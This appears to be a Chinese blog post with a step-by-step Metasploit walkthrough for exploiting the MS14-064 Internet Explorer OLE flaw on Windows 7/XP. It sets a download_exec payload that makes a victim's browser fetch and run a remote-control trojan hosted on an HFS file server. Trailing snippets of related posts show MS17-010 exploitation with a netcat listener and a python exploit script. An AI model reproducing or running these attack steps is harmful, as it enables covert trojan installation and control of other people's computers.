ms14 064漏洞別IE開啟鏈結執行遠控木馬

2021-08-02 18:19:01 字數 639 閱讀 1896

ms14_064漏洞別ie開啟鏈結執行遠控木馬

漏洞危及版本:

win7/ xp

1生成遠控小馬詳見「ngrok配合msf生成木馬」

2.將木馬上傳至hsf檔案伺服器複製鏈結

3.開啟metasploit

root@kali:~#msfconsole

msf> useexploit/windows/browser/ms14_064_ole_code_execution

msfexploit(ms14_064_ole_code_execution) > set allowpowershellprompttrue

msfexploit(ms14_064_ole_code_execution) >set srvhost

(本機ip)

msfexploit(ms14_064_ole_code_execution) >set payloadwindows/download_exec

msfexploit(ms14_064_ole_code_execution) >set url

(hsf檔案伺服器木馬url)

msf exploit(ms14_064_ole_code_execution)>exploit

4.複製msf生成的url在目標中開啟

MS14 064 漏洞測試入侵win7

microsoft windows ole遠端 執行漏洞,ole 物件鏈結與嵌入 是一種允許應用程式共享資料和功能的技術,遠端攻擊者利用此漏洞通過構造的 執行任意 影響win95 ie3 win10 ie11全版本.metasploit裡已經加入了此漏洞的利用模組 exploit windows b...

ms17 010漏洞復現

很老的洞了,只是老師上課講了,我就復現一遍。環境靶機為windows7並且存在此漏洞 攻擊機需要python3環境 nc lvp 8888 python ms17 010.py host 192.168.217.2 file shellcode 只需這兩條命令,便可以利用成功,其中ms17 010....

MS17 010漏洞復現

實驗環境 kali 虛擬機器 windows 7 x64 虛擬機器 1 檢視兩台機器的ip位址,且關閉win7防火牆 可見win7 ip為 192.168.15.129 kali 為 192.168.15.130 啟動 mdfconsole msfconsole 使用如下命令 第一句為利用auxil...